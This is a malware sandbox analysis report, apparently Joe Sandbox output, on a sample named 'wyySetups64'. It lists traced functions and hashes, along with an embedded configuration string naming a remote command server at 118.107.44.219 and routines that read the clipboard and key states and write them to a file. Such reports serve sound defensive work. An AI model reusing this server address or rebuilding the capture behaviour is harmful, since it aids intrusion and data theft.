                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0337DF10,00000000,00000000,00000000), ref: 0337E49B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03381168,?,?,?,?,?,?,03396298,0000000C,03381210,?), ref: 0337E4A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateObjectSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1891408510-0
                                                                                                                                                                                                              • Opcode ID: 6c1a86e63e0920854dd7e36131cc028546547bf6974ace6a01deb2c35313adb8
                                                                                                                                                                                                              • Instruction ID: c771ebcdf4a78bb8d4e80eb6f8d22bca8129c38e4441661a34b183d528768f5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c1a86e63e0920854dd7e36131cc028546547bf6974ace6a01deb2c35313adb8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE017B084460DBFDB60EB68ACC9E3773DCD704330F204657B920D2288D53AE8A08AA0
                                                                                                                                                                                                              Function 00BD7175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BD7181
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                                • Part of subcall function 00BD7156: __getptd_noexit.LIBCMT ref: 00BD715B
                                                                                                                                                                                                                • Part of subcall function 00BD7156: __freeptd.LIBCMT ref: 00BD7165
                                                                                                                                                                                                                • Part of subcall function 00BD7156: ExitThread.KERNEL32 ref: 00BD716E
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 00BD71A2
                                                                                                                                                                                                                • Part of subcall function 00BD9C41: __getptd_noexit.LIBCMT ref: 00BD9C47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 418257734-0
                                                                                                                                                                                                              • Opcode ID: 23b38d46995fdd5eb284169cafc4cb1d2601ca0047a584b81c8a5c620ff8b081
                                                                                                                                                                                                              • Instruction ID: 07d02b24e74a0c3e2874de12ec814688ff59a9e33aa11d8a7d61a96bfbe9f184
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23b38d46995fdd5eb284169cafc4cb1d2601ca0047a584b81c8a5c620ff8b081
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE0ECB1A446049FE708ABA0C956E6DBBB5EF04701F2000DAF1016B3B2EE75A941DB24
                                                                                                                                                                                                              Function 0337F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0337F98F
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                                • Part of subcall function 0337F964: __getptd_noexit.LIBCMT ref: 0337F969
                                                                                                                                                                                                                • Part of subcall function 0337F964: __freeptd.LIBCMT ref: 0337F973
                                                                                                                                                                                                                • Part of subcall function 0337F964: ExitThread.KERNEL32 ref: 0337F97C
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 0337F9B0
                                                                                                                                                                                                                • Part of subcall function 0338418F: __getptd_noexit.LIBCMT ref: 03384195
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 418257734-0
                                                                                                                                                                                                              • Opcode ID: 15af52034469730a457a4fbfdf15ae3bce1ccd495dfda70d7c5feaa7b14d168f
                                                                                                                                                                                                              • Instruction ID: 41b6f97b927b20e5b16f803032cb7b9465474bdce60d36472aa4811ba30d6052
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15af52034469730a457a4fbfdf15ae3bce1ccd495dfda70d7c5feaa7b14d168f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FE0ECB9D05701EFEB18FBA1D885E7D7775AF45B11F200149E1416F2A1CB79A940DA20
                                                                                                                                                                                                              Function 03386403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __lock.LIBCMT ref: 0338641B
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __mtinitlocknum.LIBCMT ref: 03388E71
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __amsg_exit.LIBCMT ref: 03388E7D
                                                                                                                                                                                                                • Part of subcall function 03388E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03383F06,0000000D,03396340,00000008,03383FFF,00000000,?,033810F0,00000000,03396278,00000008,03381155,?), ref: 03388E85
                                                                                                                                                                                                              • __tzset_nolock.LIBCMT ref: 0338642C
                                                                                                                                                                                                                • Part of subcall function 03385D22: __lock.LIBCMT ref: 03385D44
                                                                                                                                                                                                                • Part of subcall function 03385D22: ____lc_codepage_func.LIBCMT ref: 03385D8B
                                                                                                                                                                                                                • Part of subcall function 03385D22: __getenv_helper_nolock.LIBCMT ref: 03385DAD
                                                                                                                                                                                                                • Part of subcall function 03385D22: _free.LIBCMT ref: 03385DE4
                                                                                                                                                                                                                • Part of subcall function 03385D22: _strlen.LIBCMT ref: 03385DEB
                                                                                                                                                                                                                • Part of subcall function 03385D22: __malloc_crt.LIBCMT ref: 03385DF2
                                                                                                                                                                                                                • Part of subcall function 03385D22: _strlen.LIBCMT ref: 03385E08
                                                                                                                                                                                                                • Part of subcall function 03385D22: _strcpy_s.LIBCMT ref: 03385E16
                                                                                                                                                                                                                • Part of subcall function 03385D22: __invoke_watson.LIBCMT ref: 03385E2B
                                                                                                                                                                                                                • Part of subcall function 03385D22: _free.LIBCMT ref: 03385E3A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1828324828-0
                                                                                                                                                                                                              • Opcode ID: d86e74617e6f8d7d1de0c045d897513e0946b43d2dfda05b5d89c860e4d5fa54
                                                                                                                                                                                                              • Instruction ID: 74419caf2fd1f02e4679840879c38ff200e1b3986d3031dc097da584838437b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d86e74617e6f8d7d1de0c045d897513e0946b43d2dfda05b5d89c860e4d5fa54
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E01239C42B11D7DA2AFBE1B6C3A0CB264ABD4F35F90425AE6901A4A4DA740281C652
                                                                                                                                                                                                              Function 00BD474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 00BD4755
                                                                                                                                                                                                                • Part of subcall function 00BD3260: __wcsrev.LIBCMT ref: 00BF0655
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 00BD4750
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wcsrevlstrlen
                                                                                                                                                                                                              • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                                                                                                              • API String ID: 4062721203-291094236
                                                                                                                                                                                                              • Opcode ID: abfa737bd7f3f453da1e4514bc96f43f2de69a812b71007a441ec641ac519b49
                                                                                                                                                                                                              • Instruction ID: 175ee2a8b060f1f68d3ee62f2ea3c65aa360e8dcf10e314102cb079919e08129
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abfa737bd7f3f453da1e4514bc96f43f2de69a812b71007a441ec641ac519b49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAC08C7224924CCFE75033E9944863C73D8EB33B15F2040B2F600CA1A3EA518D40A3F2
                                                                                                                                                                                                              Function 03376EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,03376E9A), ref: 03376EC9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(75BF73E0), ref: 03376ED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                                                              • Opcode ID: 3fd0cba92d6abb7bf20c9cec864890de64bf551c33ae8e03bdaac398c8e3197c
                                                                                                                                                                                                              • Instruction ID: 2177e8d8cc54574c55f1a3a50c6800315c51d51f41b163cf21a968450e4efa7a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fd0cba92d6abb7bf20c9cec864890de64bf551c33ae8e03bdaac398c8e3197c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC04C72D01428A7CA10E7A4ED4494A77B85B4C210F1144C2A104A3118C634AD418F90
                                                                                                                                                                                                              Function 00BD608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                                              • Opcode ID: 00879f064e431ff0885dc97872b2122b73962f6fc304e0e7c3a0dba9718d49b2
                                                                                                                                                                                                              • Instruction ID: 898f734d9025a8aab9fe8ffc02bb070996b25d4407cf5f7c596949039e5d62ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00879f064e431ff0885dc97872b2122b73962f6fc304e0e7c3a0dba9718d49b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29E0927490868AEACF14CB41D5C4BFDB3F1AB50709F3081D6E0066B195E7742F04AA95
                                                                                                                                                                                                              Function 00BD5E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                                                                              • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                                                              • Instruction ID: eb78ba79ccf90db25eb61fc7af5d6e036378ae6d5401bc9adc19c0888ca777ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85C08C20C4CBDFE184216E171C899B8F3E0C704715F3009F3A80B216C1B3A429907AEA
                                                                                                                                                                                                              Function 00BD60DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BEFAB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                                                                                              • Opcode ID: 01212006b036d606ac69cc9549f45ea7673dc217769b24f04f9868a66ef88036
                                                                                                                                                                                                              • Instruction ID: bf50494997d9385a8439893f6c172e9c0476824219c7babe52dc7bdd103cf930
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01212006b036d606ac69cc9549f45ea7673dc217769b24f04f9868a66ef88036
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30D012B4104942C7D310AB56C5C462AB3E1BF84300F30C975E61A97711C734EC419652
                                                                                                                                                                                                              Function 00BD4274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 00BF0693
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                                                              • Opcode ID: 894ff68093c19bf475cd7aa7ce93b1057ed27db434548959f88b98db5d150161
                                                                                                                                                                                                              • Instruction ID: 43a93d6254ab54a68d20de3ee866f4ac0eb53a3d87da0a8d97524fc99b46087a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894ff68093c19bf475cd7aa7ce93b1057ed27db434548959f88b98db5d150161
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DC04C242AC29AE9E52022512DC6B3455C03746B25E7093E373236E5E39A9000443653
                                                                                                                                                                                                              Function 00BEF63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                              • Opcode ID: b956059e22e3486696b76ec957477fc52ad101492784f0e82e82dad50b540092
                                                                                                                                                                                                              • Instruction ID: b7ad7d8316aa0fe53d698031378a704a11551988357f71c253f9379570c65825
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b956059e22e3486696b76ec957477fc52ad101492784f0e82e82dad50b540092
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D900228284592AA52100A2268C87652794590464531414646503D5010DF10C2806515
                                                                                                                                                                                                              Function 00BD5EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32 ref: 00BD5EB2
                                                                                                                                                                                                                • Part of subcall function 00BD6F17: _malloc.LIBCMT ref: 00BD6F31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 617756273-0
                                                                                                                                                                                                              • Opcode ID: 235bc6dbefe7d745e93cdd0f00aff86d411661fee0870ebbba4bd523f20d9777
                                                                                                                                                                                                              • Instruction ID: 2c48103b9b7b918f5848f78b997283ed35f2b4df80a1bd8a0bc70e4c83d0bda0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 235bc6dbefe7d745e93cdd0f00aff86d411661fee0870ebbba4bd523f20d9777
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2D02372D042439BD7B03E6108C403D91E15740344F7540F5D307C7102D7750D04A3C2

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 0337E850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E8A9
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,?,0337604D), ref: 0337E8B3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337E8BF
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337E8D2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(033A1F08,00000000), ref: 0337E8DA
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0337E8E2
                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0337E8EA
                                                                                                                                                                                                              • GlobalSize.KERNEL32(00000000), ref: 0337E8FB
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0337E90C
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337E985
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E9A3
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0337E9AC
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0337E9B2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0337E9CA
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0337E9E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337EA02
                                                                                                                                                                                                              • lstrlenW.KERNEL32(03395B48,?,00000000), ref: 0337EA16
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,03395B48,00000000), ref: 0337EA25
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337EA2C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0337EA38
                                                                                                                                                                                                              • GetKeyState.USER32(00000014), ref: 0337EABC
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0339B4A8), ref: 0337EB0B
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EB1D
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0339B4D0), ref: 0337EB3E
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0339B4D0), ref: 0337EB61
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EB7F
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EB95
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EBBF
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 0337EC0B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0337EC21
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0337EC3B
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337EC59
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0337EC69
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0337EC74
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337EC7B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0337EC88
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
